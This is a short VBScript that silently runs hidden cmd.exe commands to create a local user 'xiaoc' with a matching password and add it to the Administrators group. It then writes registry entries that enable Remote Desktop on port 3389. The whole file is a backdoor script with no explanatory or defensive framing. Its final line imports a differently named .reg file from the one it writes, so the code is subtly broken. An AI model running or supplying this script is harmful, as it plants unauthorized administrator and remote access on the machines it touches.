set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user xiaoc xiaoc /add",0) 
b=wshshell.run ("cmd.exe /c net localgroup Administrators xiaoc /add",0) 
c=wshshell.run ("cmd.exe /c echo Windows Registry Editor Version 5.00>>3389.reg",0)
d=wshshell.run ("cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg",0)
e=wshshell.run ("cmd.exe /c echo ""fDenyTSConnections""=dword:00000000>>3389.reg",0)
f=wshshell.run ("cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg",0)
g=wshshell.run ("cmd.exe /c echo ""PortNumber""=dword:00000d3d>>3389.reg",0)
h=wshshell.run ("cmd.exe /c echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg",0)
i=wshshell.run ("cmd.exe /c echo ""PortNumber""=dword:00000d3d>>3389.reg",0)
j=wshshell.run ("cmd.exe /c regedit /s 33891.reg",0)